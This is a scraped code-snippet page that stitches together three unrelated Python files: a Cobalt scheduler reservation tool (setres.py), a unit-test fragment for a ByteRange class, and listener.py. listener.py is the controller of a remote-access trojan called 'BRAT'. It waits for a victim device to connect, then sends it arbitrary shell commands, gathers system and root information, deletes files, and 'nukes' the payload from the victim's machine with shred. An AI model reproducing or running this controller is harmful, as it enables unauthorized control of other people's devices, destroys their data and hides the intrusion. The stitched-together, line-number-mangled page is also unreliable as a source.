Best Python code snippet using autotest_python
setres.py
Source:setres.py  
#!/usr/bin/env python
"""
Setup reservations in the scheduler
Usage: %prog --help
Usage: %prog [options] <partition1> ... <partitionN>
version: "%prog " + __revision__ + , Cobalt  + __version__
OPTIONS DEFINITIONS:
'-A','--project',dest='project',type='string',help='set project name for partitions in args'
'-D','--defer',dest='defer',help='defer flag. needs to be used with -m',action='store_true'
'-c','--cycletime',dest='cycle',type='string',help='set cycle time in minutes or HH:MM:SS',callback=cb_time
'-d','--duration',dest='duration',type='string',help='duration time in minutes or HH:MM:SS',callback=cb_time
'-m','--modify_res',dest='modify_res',help='modify current reservation specified in -n',action='store_true'
'-n','--name',dest='name',type='string',help='reservation name to add or modify'
'-p','--partitions',dest='partitions',type='string',help='partition(s) (now optional) part1:..:partN'
'-q','--queue',dest='queue',type='string',help='queue name'
'-s','--starttime',dest='start',type='string',help='start date time: YYYY_MM_DD-HH:MM, or now',callback=cb_date
'-u','--user',dest='users',type='string',help='user id list (user1:user2:... or "*" for all users)',callback=cb_res_users
'--debug',dest='debug',help='turn on communication debugging',callback=cb_debug
'--allow_passthrough',dest='block_passthrough',help='allow passthrough',callback=cb_passthrough
'--block_passthrough',dest='block_passthrough',help='do not allow passthrough',callback=cb_passthrough
OPTIONS TO CHANGE IDS ONLY:
'--cycle_id',dest='cycle_id',type='int',help='cycle id'
'--force_id',dest='force_id',default=False,help='force id flag (only used with --cycle_id or --res_id',action='store_true'
'--res_id',dest='res_id',type='int',help='res id'
"""
# NOTE: the module docstring above is runtime data, not only documentation:
# main() substitutes __revision__ / __version__ into it and passes the result
# to ArgParse.  Do not reword it.
import logging
import math
import sys
import time

from Cobalt import client_utils
from Cobalt.client_utils import cb_debug, cb_time, cb_date, cb_passthrough, cb_res_users
from Cobalt.Util import expand_num_list, compact_num_list
from Cobalt.arg_parser import ArgParse

__revision__ = '$Id: setres.py 2154 2011-05-25 00:22:56Z richp $'
__version__ = '$Version$'

SCHMGR = client_utils.SCHMGR
SYSMGR = client_utils.SYSMGR


def validate_starttime(parser):
    """
    Make sure the reservation has not already ended.

    Logs an error and exits with status 1 when start time plus duration is
    earlier than the current local time.
    """
    now = client_utils.parse_datetime(client_utils.cobalt_date(time.localtime(time.time())))
    res_end = parser.options.start + parser.options.duration
    if res_end < now:
        client_utils.logger.error("Start time + duration %s already in the past",
                                  client_utils.sec_to_str(res_end))
        sys.exit(1)


def set_res_id(parser):
    """
    Set (or, with --force_id, force) the res id on the SCHMGR component.
    """
    if parser.options.force_id:
        client_utils.component_call(SCHMGR, False, 'force_res_id', (parser.options.res_id,))
        client_utils.logger.info("WARNING: Forcing res id to %s" % parser.options.res_id)
    else:
        client_utils.component_call(SCHMGR, False, 'set_res_id', (parser.options.res_id,))
        client_utils.logger.info("Setting res id to %s" % parser.options.res_id)


def set_cycle_id(parser):
    """
    Set (or, with --force_id, force) the cycle id on the SCHMGR component.
    """
    cycle_id = parser.options.cycle_id
    if parser.options.force_id:
        client_utils.component_call(SCHMGR, False, 'force_cycle_id', (cycle_id,))
        client_utils.logger.info("WARNING: Forcing cycle id to %s" % str(cycle_id))
    else:
        client_utils.component_call(SCHMGR, False, 'set_cycle_id', (cycle_id,))
        client_utils.logger.info("Setting cycle_id to %s" % str(cycle_id))


def verify_locations(partitions):
    """
    Verify that the requested partitions are known to the SYSMGR component.

    partitions -- list of partition names; on 'alps_system' each entry is a
                  compact node list that is expanded before checking.

    Logs the missing locations and exits with status 1 if any requested
    location is not returned by the component's 'verify_locations' call.
    """
    system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())
    if not partitions:
        # Nothing to verify; no verification call is made for an empty request.
        return

    if system_type in ['alps_system']:
        # nodes come in as compact lists.  expand them all first so the
        # component is asked exactly once instead of once per list.
        check_partitions = []
        for num_list in partitions:
            check_partitions.extend(expand_num_list(num_list))
        test_parts = client_utils.component_call(SYSMGR, False,
                                                 'verify_locations', (check_partitions,))
        # On Cray we will be a little looser to make setting reservations
        # easier.
        client_utils.logger.info('Found Nodes: %s', compact_num_list(test_parts))
        missing_nodes = set(check_partitions) - set(test_parts)
        if missing_nodes:
            # TODO: relax this, we should allow for this to occur, but
            # reservation-queue data amalgamation will need a fix to get
            # this to work. --PMR
            client_utils.logger.error("Missing partitions: %s" %
                                      (",".join([str(nid) for nid in sorted(missing_nodes)])))
            client_utils.logger.error("Aborting reservation setup.")
            sys.exit(1)
    else:
        # The whole list is sent in one request; repeating the identical
        # call once per partition adds nothing.
        test_parts = client_utils.component_call(SYSMGR, False,
                                                 'verify_locations', (partitions,))
        if len(test_parts) != len(partitions):
            missing = [p for p in partitions if p not in test_parts]
            client_utils.logger.error("Missing partitions: %s" % (" ".join(missing)))
            sys.exit(1)


def validate_args(parser, spec, opt_count):
    """
    Validate setres arguments.

    parser    -- parsed command line (options and positional args)
    spec      -- dict that receives spec['partitions'] when partitions are given
    opt_count -- option count as returned by client_utils.get_options()

    Returns True if the caller should go on to add/modify a reservation, and
    False when only an id change was requested (it is performed here).
    Exits with status 1 on any invalid combination of arguments.
    """
    system_type = client_utils.component_call(SYSMGR, False, 'get_implementation', ())

    # -p values are treated exactly like positional partition arguments
    if parser.options.partitions is not None:
        parser.args += parser.options.partitions.split(':')

    only_id_change = parser.options.cycle_id is not None or parser.options.res_id is not None
    if only_id_change and (not parser.no_args() or (opt_count != 0)):
        client_utils.logger.error('No partition arguments or other options allowed with id change options')
        sys.exit(1)

    if parser.options.force_id and not only_id_change:
        client_utils.logger.error("--force_id can only be used with --cycle_id and/or --res_id.")
        sys.exit(1)

    if only_id_change:
        # make the ID change and we are done with setres
        if parser.options.res_id is not None:
            set_res_id(parser)
        if parser.options.cycle_id is not None:
            set_cycle_id(parser)
        return False  # quit, setres is done

    if parser.options.name is None:
        client_utils.print_usage(parser)
        sys.exit(1)

    modifying = parser.options.modify_res is not None
    if parser.no_args() and not modifying:
        client_utils.logger.error("Must supply either -p with value or partitions as arguments")
        sys.exit(1)
    if parser.options.start is None and not modifying:
        client_utils.logger.error("Must supply a start time for the reservation with -s")
        sys.exit(1)
    if parser.options.duration is None and not modifying:
        client_utils.logger.error("Must supply a duration time for the reservation with -d")
        sys.exit(1)
    if parser.options.defer is not None and (parser.options.start is not None or
                                             parser.options.cycle is not None):
        client_utils.logger.error("Cannot use -D while changing start or cycle time")
        sys.exit(1)

    # if we have command line arguments, verify them and put them in spec
    if not parser.no_args():
        if system_type in ['alps_system']:
            nodes = []
            for arg in parser.args:
                nodes.extend(expand_num_list(arg))
            compact_nodes = compact_num_list(nodes)
            verify_locations([compact_nodes])
            spec['partitions'] = compact_nodes
        else:
            verify_locations(parser.args)
            spec['partitions'] = ":".join(parser.args)

    return True  # continue, setres is not done.


def modify_reservation(parser):
    """
    Apply the command-line changes to the existing reservation named by -n.

    Exits with status 1 if the reservation cannot be found, or if -D is used
    on a reservation without a cycle time.  After the update, the modified
    reservation and the result of 'check_reservations' are logged.
    """
    query = [{'name': parser.options.name, 'start': '*', 'cycle': '*', 'duration': '*'}]
    res_list = client_utils.component_call(SCHMGR, False, 'get_reservations', (query,))
    if not res_list:
        client_utils.logger.error("cannot find reservation named '%s'" % parser.options.name)
        sys.exit(1)

    updates = {}  # updates to reservation
    if parser.options.defer is not None:
        res = res_list[0]
        if not res['cycle']:
            client_utils.logger.error("Cannot use -D on a non-cyclic reservation")
            sys.exit(1)
        start = res['start']
        duration = res['duration']
        cycle = float(res['cycle'])
        now = time.time()
        # number of whole cycles elapsed since the recorded start
        periods = math.floor((now - start) / cycle)
        if periods < 0:
            # recorded start is still in the future: push it back one cycle
            start += cycle
        elif (now - start) % cycle < duration:
            # currently inside an active window
            start += (periods + 1) * cycle
        else:
            # between windows
            start += (periods + 2) * cycle
        newstart = time.strftime("%c", time.localtime(start))
        client_utils.logger.info("Setting new start time for reservation '%s': %s" % (res['name'], newstart))
        updates['start'] = start
        # add a field to updates to indicate we're deferring:
        updates['defer'] = True
    else:
        if parser.options.start is not None:
            updates['start'] = parser.options.start
        if parser.options.duration is not None:
            updates['duration'] = parser.options.duration

    if parser.options.users is not None:
        updates['users'] = None if parser.options.users == "*" else parser.options.users
    if parser.options.project is not None:
        updates['project'] = parser.options.project
    if parser.options.cycle is not None:
        updates['cycle'] = parser.options.cycle
    if not parser.no_args():
        # NOTE(review): validate_args stores a compact node list in
        # spec['partitions'] on 'alps_system', but the raw ':'-joined args are
        # sent here -- confirm that is intended for modifications.
        updates['partitions'] = ":".join(parser.args)
    if parser.options.block_passthrough is not None:
        updates['block_passthrough'] = parser.options.block_passthrough

    comp_args = ([{'name': parser.options.name}], updates, client_utils.getuid())
    client_utils.component_call(SCHMGR, False, 'set_reservations', comp_args)

    reservations = client_utils.component_call(
        SCHMGR, False, 'get_reservations',
        ([{'name': parser.options.name, 'users': '*', 'start': '*', 'duration': '*',
           'partitions': '*', 'cycle': '*', 'res_id': '*', 'project': '*',
           'block_passthrough': '*'}], ))
    client_utils.logger.info(reservations)
    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))


def add_reservation(parser, spec, user):
    """
    Add a new reservation described by spec on behalf of user.

    Fills the users, cycle and project entries of spec from the command line,
    defaults block_passthrough to False when the option was not given, and
    logs the results of 'add_reservations' and 'check_reservations'.
    """
    validate_starttime(parser)
    spec['users'] = None if parser.options.users == '*' else parser.options.users
    spec['cycle'] = parser.options.cycle
    spec['project'] = parser.options.project
    if parser.options.block_passthrough is None:
        spec['block_passthrough'] = False
    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'add_reservations', ([spec], user)))
    client_utils.logger.info(client_utils.component_call(SCHMGR, False, 'check_reservations', ()))


def main():
    """
    setres main
    """
    # setup logging for client. The clients should call this before doing anything else.
    client_utils.setup_logging(logging.INFO)

    spec = {}  # map of destination option strings and parsed values
    opts = {}  # old map
    opt2spec = {}

    # list of callback with its arguments
    callbacks = [
        # <cb function>           <cb args>
        [cb_time, (False, True, True)],  # no delta time, Seconds, return int
        [cb_date, (True,)],  # Allow to set the date to 'now'
        [cb_passthrough, ()],
        [cb_debug, ()],
        [cb_res_users, ()]]

    # Get the version information
    opt_def = __doc__.replace('__revision__', __revision__)
    opt_def = opt_def.replace('__version__', __version__)

    parser = ArgParse(opt_def, callbacks)
    user = client_utils.getuid()

    parser.parse_it()  # parse the command line
    opt_count = client_utils.get_options(spec, opts, opt2spec, parser)

    # if continue to process options then
    if validate_args(parser, spec, opt_count):
        if parser.options.modify_res is not None:
            # modify an existing reservation
            modify_reservation(parser)
        else:
            # add new reservation
            add_reservation(parser, spec, user)


if __name__ == '__main__':
    try:
        main()
    except SystemExit:
        raise
    except Exception as exc:
        client_utils.logger.fatal("*** FATAL EXCEPTION: %s ***", exc)
        # an unexpected failure must not look like success to the caller
        sys.exit(1)
Source:listener.py  
1import os2import sys3from time import sleep4host = sys.argv[1]5port = int(sys.argv[2])6output = sys.argv[3]7import socket8import sys9from time import asctime10from time import sleep11print(("[" + asctime() + "] Listening on port " + str(port)))12sleep(1)13try:14    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)15    s.bind((host, port))16    s.listen(5)17    print("[" + asctime() + "] Waiting Connection From Client...")18    c, _ = s.accept()19    print(('[' + asctime() + '] Session Opened | ' + 'IP : ' + _[0] + ' | Port : ' + str(_[1])+'\n'))20    sleep(2)21except OSError as error:22    print('[i] ' + str(error))23    sys.exit()24def raw_converter(string):25    string = str(string)26    n = r'\n'27    t = r'\t'28    bs = r"b'"29    be = r"\n'"30    result = string.replace(bs, '')31    result = result.replace(be, r'\n')32    result = result.replace(n, '\n')33    result = result.replace(t, '\t')34    return result35def main(prog_name):36    and_pwd = ' && pwd\n'37    meminfo = 'cat /proc/meminfo'38    nuke_it = 'shred --force -n 35 -u -v -z ' + prog_name39    cpuinfo = 'cat /proc/cpuinfo'40    crypto = 'cat /proc/crypto'41    check_root = 'which su'42    check_partitions = 'cat /proc/partitions'43    whoami = 'whoami'44    and_pwd = and_pwd.encode()45    meminfo = meminfo.encode()46    nuke_it = nuke_it.encode()47    cpuinfo = cpuinfo.encode()48    crypto = crypto.encode()49    check_root = check_root.encode()50    check_partitions = check_partitions.encode()51    whoami = whoami.encode()52    print("[i] Type '#help' for information.")53    while True:54        hosttt = _[0]55        cmd = input('[' + asctime() + ' | BRAT@' + hosttt + ']: ')56        57        if cmd[0:5] == 'mkdir':58            cmd = cmd.encode()59            c.send(cmd+and_pwd)60            output = c.recv(100000)61            output = raw_converter(output)62            print(output)63        64        elif cmd == 'meminfo':65            c.send(meminfo)66            output = 
c.recv(100000)67            output = raw_converter(output)68            print(output)69        70        elif cmd == 'cpuinfo':71            c.send(cpuinfo)72            output = c.recv(100000)73            output = raw_converter(output)74            print(output)75        76        elif cmd == 'crypto':77            c.send(crypto)78            output = c.recv(100000)79            output = raw_converter(output)80            print(output)81        82        elif cmd == 'kernel_info':83            cmd = cmd.encode()84            c.send(cmd)85            ab = c.recv(100000)86            ab = raw_converter(ab)87            print(("\n[+] \033[37;1mKernel Version : "+str(ab)))88        89        elif cmd == 'check_root':90            c.send(check_root)91            a = c.recv(100000)92            if a == r'\n/system/bin/su\n':93                print("\n[*] This Device Is Rooted...\n")94            95            else:96                print("\n[*] This Device Not Rooted...\n")97            98        elif cmd == 'su':99            print("\n[*] Command 'SU' Not *Yet* Working...\n")100            continue101        102        elif cmd == 'check_partitions':103            c.send(check_partitions)104            print('')105            output = c.recv(1000000)106            output = raw_converter(output)107            print(output)108        109        elif cmd == '#help':110            print("""111#help            : Shows this help menu112kernel_info      : Check Kernel Version + Info113mkdir            : Create Directory On Target114meminfo          : Check Info Memory Target115cpuinfo          : Check Info CPU Target116rm               : Remove File On Target117rmdir            : Remove Folder On Target118whoami           : Check Name User Target119crypto           : Check Encoding On Target120check_partitions : Check Info Partisi On Target121#nuke            : Shred and delete the payload from the victim's machine122#logout          : Close the connection123""")124        
elif cmd[0:2] == 'rm':125            cmd = cmd.encode()126            c.send(cmd+and_pwd)127            output = c.recv(100000)128            output = raw_converter(output)129        130        elif cmd[0:5] == 'rmdir':131            cmd = cmd.encode()132            c.send(cmd+and_pwd)133            output = c.recv(100000)134            output = raw_converter(output)135            print(output)136        137        elif cmd[0:6] == 'whoami':138            c.send(whoami)139            output = c.recv(100000)140            output = raw_converter(output)141            print(output)142        elif cmd == '#nuke':143            c.send(nuke_it)144            output = c.recv(100000)145            output = raw_converter(output)146            print(output)147        elif cmd == '#logout':148            #c.close()149            print("[" + asctime() + "] Connection closed by local host...")150            break151        152        elif cmd == '':153            continue154        155        else:156            cmd = cmd.encode()157            c.send(cmd)158            results = c.recv(100000)159            results = raw_converter(results)160            if results == 'bacod':161                continue162            print(results)163try:164    main(output)165except KeyboardInterrupt:166    print("[!] CTRL+C Detected. Shutdown Server...")167    sleep(2)168    sys.exit()169except socket.error:170    print("[!] Connection closed by foreign host...")171    sleep(2)...test_byte_range.py
Source:test_byte_range.py  
...12    def check_partition(self, byte_range, expected):13        assert isinstance(byte_range, ByteRange)14        assert isinstance(expected, bool)15        self.assertEqual(expected, byte_range.does_partition())16    def check_partitions(self, *params):17        assert len(params) % 2 == 018        for idx in xrange(0, len(params), 2):19            self.check_partition(params[idx], params[idx+1])20    def test_add_subrange(self):21        """22        Test add_subrange() method23        """24        br = ByteRange(0, 1000)25        self.check_partition(br, True)26        self.assertEqual('<BytesRange:0-1000>', str(br))27        # Add 1st subrange28        br.add_subrange(offset=100, length=51)29        self.check_partition(br, False)30        self.check_subranges(br, (100, 151))31        # Add a subrange in the front32        br.add_subrange(offset=50, length=7)33        self.check_partition(br, False)34        self.check_subranges(br, (50, 57), (100, 151))35        # Add a subrange in the end36        br.add_subrange(offset=200, length=800)37        self.check_partition(br, False)38        self.check_subranges(br, (50, 57), (100, 151), (200, 1000))39        # Fill out the remaining gap to completely cover the byte range40        br.add_subrange(offset=0, length=50)41        br.add_subrange(offset=57, length=43)42        br.add_subrange(offset=151, length=49)43        self.check_partition(br, True)44        self.check_subranges(br, (0, 50), (50, 57), (57, 100), (100, 151), (151, 200), (200, 1000))45    def test_nested_subranges(self):46        """47        Test nested subranges methods48        """49        br1 = ByteRange(0, 100)50        self.check_partitions(br1, True)51        # Add 2nd layer52        br11 = br1.add_subrange(0, 20)53        self.check_partitions(br1, False, br11, True)54        br12 = br1.add_subrange(20, 50)55        self.check_partitions(br1, False, br12, True)56        br13 = br1.add_subrange(70, 30)57        self.check_partitions(br1, 
True, br13, True)58        # Add 3rd layer59        br121 = br12.add_subrange(0, 30)60        self.check_partitions(br1, False, br12, False, br121, True)61        br122 = br12.add_subrange(30, 20)62        self.check_partitions(br1, True, br12, True, br122, True)63        # Add 4th layer64        br1211 = br121.add_subrange(0, 15)65        self.check_partitions(br1, False, br12, False, br121, False, br1211, True)66        br1212 = br121.add_subrange(15, 10)67        self.check_partitions(br1, False, br12, False, br121, False, br1212, True)68        br1213 = br121.add_subrange(25, 5)69        self.check_partitions(br1, True, br12, True, br121, True, br1213, True)70        # Verify all the absolute offsets71        self.assertEqual((0, 20), br11.abs_range())72        self.assertEqual((20, 35), br1211.abs_range())73        self.assertEqual((35, 45), br1212.abs_range())74        self.assertEqual((45, 50), br1213.abs_range())75        self.assertEqual((50, 70), br122.abs_range())76        self.assertEqual((70, 100), br13.abs_range())77    def test_errors(self):78        br = ByteRange(0, 100)79        # Add 2 subranges80        br.add_subrange(20, 10)81        br.add_subrange(60, 20)82        # Add an overlapping subrange in front of 1st subrange83        self.assertRaises(ValueError, lambda: br.add_subrange(0, 21))...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You can also refer to the video tutorials on the LambdaTest YouTube channel for step-by-step demonstrations from industry experts.
Get 100 minutes of automation testing FREE!!
